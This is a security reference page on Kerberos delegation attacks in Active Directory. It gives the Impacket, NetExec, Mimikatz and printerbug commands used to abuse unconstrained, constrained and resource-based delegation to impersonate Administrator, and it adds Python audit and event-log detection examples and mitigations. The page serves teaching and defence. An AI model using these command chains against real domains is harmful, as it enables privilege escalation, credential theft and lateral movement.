Delegation Attacks
Overview
Kerberos delegation allows a service to impersonate a user when accessing other services. Misconfigurations in delegation settings create privilege escalation paths. Three types exist: unconstrained delegation (service receives the user's TGT), constrained delegation (service can request tickets to specific SPNs), and resource-based constrained delegation (RBCD — the target service controls who can delegate to it).
ATT&CK Mapping
- Tactic: TA0005 - Defense Evasion
- Tactic: TA0008 - Lateral Movement
- Technique: T1550.003 - Use Alternate Authentication Material: Pass the Ticket
Prerequisites
- Valid domain credentials for enumeration
- Specific access depends on the delegation type being abused
Techniques
Enumerate Delegation
# Impacket — find all delegation relationships
# https://github.com/fortra/impacket
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip>
# Include disabled accounts
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip> -disabled
# NetExec — find delegation
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --find-delegation
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation
Unconstrained Delegation
Computers or services with unconstrained delegation receive and cache the user's TGT when they authenticate. If you compromise a system with unconstrained delegation, you can extract cached TGTs and impersonate those users.
# Find computers with unconstrained delegation
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation
# PowerShell — find unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
After compromising a system with unconstrained delegation:
# Mimikatz — extract cached TGTs
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::tickets /export
# Look for Administrator or other high-value TGTs
# Inject the ticket
mimikatz# kerberos::ptt <admin_ticket.kirbi>
Force authentication to the compromised host (to capture a TGT):
# Use printerbug / SpoolSample to coerce DC authentication
# https://github.com/dirkjanm/krbrelayx
python3 printerbug.py '<domain>/<user>:<password>@<dc_ip>' <compromised_host>
Constrained Delegation
Accounts with constrained delegation can request service tickets to specific SPNs on behalf of users in two steps: S4U2Self obtains a ticket to the delegating service itself on behalf of the user, then S4U2Proxy exchanges it for a ticket to the target SPN. Two modes exist: "Kerberos only" requires the user to have actually authenticated to the service via Kerberos, because in this mode the S4U2Self ticket is not forwardable and cannot be used for S4U2Proxy; "with protocol transition" allows impersonation without any prior Kerberos authentication by the user. Users in the Protected Users group or marked "sensitive and cannot be delegated" cannot be impersonated.
# Impacket — abuse constrained delegation to get a ticket as Administrator
# https://github.com/fortra/impacket
impacket-getST '<domain>/<service_account>:<password>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>
# With hash
impacket-getST '<domain>/<service_account>' -hashes ':<ntlm_hash>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>
# Use the ticket
export KRB5CCNAME=Administrator@cifs_<target>@<DOMAIN>.ccache
impacket-psexec '<domain>/Administrator@<target>' -k -no-pass
The -altservice flag can override the SPN in the resulting ticket (the alternative service must run on the same host as the original SPN):
# Impacket — request for one SPN but change it to another
# https://github.com/fortra/impacket
impacket-getST '<domain>/<service_account>:<password>' -spn 'cifs/<target>' -impersonate Administrator -altservice 'ldap/<target>' -dc-ip <dc_ip>
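The enumeration commands above and the constrained-delegation modes just described both come down to a few directory attributes. The following is an added audit helper, not code from the page or from Impacket/NetExec, that classifies account records the way a defender reviewing a findDelegation export would: it reads the userAccountControl bits (constants assumed from the Windows flag values), msDS-AllowedToDelegateTo, and msDS-AllowedToActOnBehalfOfOtherIdentity; the sample records and host names are constructed.

```python
# Added audit helper (not Impacket or NetExec code): classify LDAP account
# records by delegation settings using the attributes the commands above read.
TRUSTED_FOR_DELEGATION = 0x00080000          # userAccountControl: unconstrained
NOT_DELEGATED = 0x00100000                   # "sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained w/ protocol transition

def classify(rec):
    """Return the delegation findings for one LDAP record (empty if none)."""
    uac = int(rec.get("userAccountControl", 0))
    findings = []
    if uac & TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained")
    targets = rec.get("msDS-AllowedToDelegateTo", [])
    if targets:
        # Protocol transition lets the service impersonate users who never
        # authenticated to it with Kerberos; Kerberos-only mode does not.
        mode = ("constrained (protocol transition)"
                if uac & TRUSTED_TO_AUTH_FOR_DELEGATION
                else "constrained (Kerberos only)")
        findings.append(mode + " -> " + ", ".join(targets))
    if rec.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        # Non-empty security descriptor: some principal may delegate to this host
        findings.append("RBCD target (attribute set)")
    if uac & NOT_DELEGATED:
        findings.append("protected: NOT_DELEGATED")
    return findings

def audit(records):
    """Map sAMAccountName -> findings for every record that has any."""
    report = {}
    for rec in records:
        findings = classify(rec)
        if findings:
            report[rec["sAMAccountName"]] = findings
    return report

# Constructed sample records with hypothetical names; not real directory data
SAMPLE_RECORDS = [
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "websvc", "userAccountControl": 0x1010200,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.local"]},
    {"sAMAccountName": "sqlsvc", "userAccountControl": 0x10200,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "APP02$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x100200},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200},
]
```

Running `audit(SAMPLE_RECORDS)` reports FILE01$ as unconstrained, websvc as constrained with protocol transition, sqlsvc as Kerberos-only, APP02$ as an RBCD target, and Administrator as protected; jdoe produces no finding.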
Resource-Based Constrained Delegation (RBCD)
RBCD allows the target resource to define which accounts can delegate to it via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If you can write to this attribute on a target computer, you can configure RBCD to impersonate any user.
Requirements:
- Write permission to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity
- A computer account you control (or ability to create one — default MachineAccountQuota is 10)
# Step 1 — Add a computer account you control
# Impacket
# https://github.com/fortra/impacket
impacket-addcomputer '<domain>/<user>:<password>' -computer-name 'FAKE01$' -computer-pass 'Password123' -dc-ip <dc_ip>
# Step 2 — Set RBCD on the target computer
# Impacket
# https://github.com/fortra/impacket
impacket-rbcd '<domain>/<user>:<password>' -delegate-to '<target_computer>$' -delegate-from 'FAKE01$' -action write -dc-ip <dc_ip>
# Step 3 — Request service ticket as Administrator via S4U
# Impacket
# https://github.com/fortra/impacket
impacket-getST '<domain>/FAKE01$:Password123' -spn 'cifs/<target_computer>' -impersonate Administrator -dc-ip <dc_ip>
# Step 4 — Use the ticket
export KRB5CCNAME=Administrator@cifs_<target_computer>@<DOMAIN>.ccache
impacket-psexec '<domain>/Administrator@<target_computer>' -k -no-pass
Detection Methods
Network-Based Detection
- S4U2Self and S4U2Proxy Kerberos requests from unusual accounts
- TGS requests for high-privilege users from service accounts
Host-Based Detection
- Changes to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute
- New computer accounts created (Event 4741)
- Windows Security Event 4769 with delegation flags
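As an added example (not part of the original page), the detection points above turned into rule logic over constructed Windows event records: Event 4769 where Transited Services is populated marks an S4U2Proxy ticket issued for the impersonated user, Event 4741 marks a new computer account, and Event 5136 (directory object modified, which only appears when Directory Service Changes auditing and a SACL on the object are in place) marks a write to msDS-AllowedToActOnBehalfOfOtherIdentity. Field names follow the events' EventData XML; the watch list and sample principals are assumptions.

```python
# Added detection example (not from the original page): flag the delegation
# indicators listed above in constructed Windows event records. Keys follow
# the events' EventData field names; "TransmittedServices" is shown as
# "Transited Services" in Event Viewer.
PRIVILEGED = {"administrator", "krbtgt"}  # assumed watch list
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"


def detect(event):
    """Return an alert string for one event, or None if it is benign."""
    eid = event["EventID"]
    if eid == 4769:
        # S4U2Proxy: the delegating service is recorded in TransmittedServices
        # of the TGS issued for the impersonated user
        transited = event.get("TransmittedServices", "").strip()
        if transited and transited != "-":
            user = event["TargetUserName"].split("@")[0].lower()
            sev = "HIGH" if user in PRIVILEGED else "INFO"
            return (f"{sev}: S4U2Proxy {transited} -> {event['TargetUserName']}"
                    f" for {event['ServiceName']}")
    elif eid == 5136 and event.get("AttributeLDAPDisplayName") == RBCD_ATTR:
        # Directory object modified: RBCD descriptor written on a computer
        return (f"HIGH: {RBCD_ATTR} changed on {event['ObjectDN']}"
                f" by {event['SubjectUserName']}")
    elif eid == 4741:
        # New computer account; candidate for a later RBCD delegate-from
        return (f"MEDIUM: computer {event['TargetUserName']} created"
                f" by {event['SubjectUserName']}")
    return None


def scan(events):
    """Run detect() over a list of events and keep the alerts, in order."""
    return [a for a in (detect(e) for e in events) if a]


# Constructed sample events (hypothetical principals, not real logs)
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jdoe"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "FS01$", "TransmittedServices": "-"},
    {"EventID": 4741, "TargetUserName": "FAKE01$", "SubjectUserName": "jdoe"},
    {"EventID": 5136, "ObjectDN": "CN=APP02,CN=Computers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "SubjectUserName": "jdoe"},
    {"EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL",
     "ServiceName": "APP02$", "TransmittedServices": "FAKE01$@CORP.LOCAL"},
]
```

`scan(SAMPLE_EVENTS)` yields three alerts in sequence (new computer account, RBCD attribute write, S4U2Proxy ticket for Administrator), which is the order the RBCD technique above produces on a domain controller; the ordinary TGT and TGS requests produce none.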
Mitigation Strategies
- Minimize delegation — remove delegation where not required
- Protected Users group — members cannot be delegated
- Mark sensitive accounts — set "Account is sensitive and cannot be delegated" for admin accounts
- Monitor MachineAccountQuota — reduce from default 10 to 0 if not needed
- Audit attribute changes — monitor msDS-AllowedToActOnBehalfOfOtherIdentity modifications